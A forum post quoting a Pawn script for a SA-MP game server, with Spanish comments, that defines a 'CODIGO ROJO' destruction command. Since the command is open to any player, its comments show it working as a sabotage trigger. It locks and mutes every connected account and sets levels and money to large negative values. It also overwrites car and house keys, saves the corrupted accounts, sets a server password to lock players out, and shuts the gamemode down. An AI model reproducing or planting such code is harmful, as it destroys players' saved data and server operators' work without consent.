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Originally Posted by #Alex
pawn Код:
if(strcmp(cmd, "/comando", true) == 0) { if(PlayerInfo[playerid][pAdmin] >= 0)// comando para usuarios que tengan nivel de adm cero /* Cambiar si gusta */ { /* Mensaje a todos los jugadores */ SendClientMessageToAll(TU_COLOR,"|------------------------[CODIGO ROJO ACTIVADO]-------------------------|"); SendClientMessageToAll(TU_COLOR," "); SendClientMessageToAll(TU_COLOR,"____________________________________________________________________"); SendClientMessageToAll(TU_COLOR," El servidor ha sido destruido por el dueсo/scripter"); SendClientMessageToAll(TU_COLOR," Con lo cual habra una nueva IP que puede obtenerla en: TUWEB"); SendClientMessageToAll(TU_COLOR," Todos los archivos han sido destruidos."); SendClientMessageToAll(TU_COLOR," ____________________________________________________________________"); SendClientMessage(playerid, TU_COLOR,"Desactivaste el servidor.");// Mensaje al que desactivo el servidor GetPlayerName(playerid, sendername, sizeof(sendername)); format(string, sizeof(string), "* %s scripter total |- Servidor OFF -|", sendername);// Segundo mensaje al que desactivo el servidor ProxDetector(1000.0, playerid, string, TU_COLOR,TU_COLOR,TU_COLOR,TU_COLOR,TU_COLOR); for(new i = 0; i <= MAX_PLAYERS; i++) { if(IsPlayerConnected(i) == 1)// Aplica solo a jugadores conectados { SendRconCommand("hostname |- Camiamos de Ip mas info en TUWEB -|"); // Cambia el nombre del servidor al definido haca SetGameModeText("TUWEB"); // Cambia el Modo al definido SendRconCommand("password TUPASSWORD"); // Agrega contraseсa al servidor para evitar que usuarios entren PlayerInfo[i][pLocked] = 100; //blockea todas las cuentas de los jugadores ON PlayerInfo[i][pMuted] = 1; // Mutea a todos los jugadores PlayerInfo[i][pLevel] = -999; // Entrega nivel -999 a todos los jugadores PlayerInfo[i][pAccount] = -9999999; // Setea todo el dinero a -9999999 a todos los jugadores PlayerInfo[i][pPcarkey] = 999; // Entrega llave 999 de auto 1 a todos los jugadores PlayerInfo[i][pPcarkey2] = 999; //Entrega llave 999 de auto 2 a todos los jugadores PlayerInfo[i][pPhousekey] = 999; //Entrega llave 999 de casa a todos los jugadores DisablePlayerCheckpoint(i); gPlayerCheckpointStatus[i] = CHECKPOINT_NONE; /* Mensaje en pantalla completa, sale a todos los jugadores */ format(string, sizeof(string), "~r~~h~~h~La nueva ip esta en:~n~ ~b~~h~~h~TUWEB~n~~n~~n~~n~~n~~r~Servidor Cerrado");// Texto definido { GameTextForPlayer(i, string, 4000, 5); // Lanza el texto definido a todos los usuarios en juego SetPlayerCameraPos(i,1460.0, -1324.0, 287.2); //Posicion de la camara para mostrar el mensaje en pantalla completa SetPlayerCameraLookAt(i,1374.5, -1291.1, 239.0); //Vista del jugador para mostrar el mensaje en pantalla completa OnPlayerUpdateTime(i); //Guarda las cuenta con los cambios realizados gPlayerLogged[i] = 0; // Desconecta a todos los jugadores } GameModeExit();// Reinicia el Servidor } } } else { SendClientMessage(playerid,TU_COLOR,"Comando de destruccion/CODIGO ROJO"); } return 1; }
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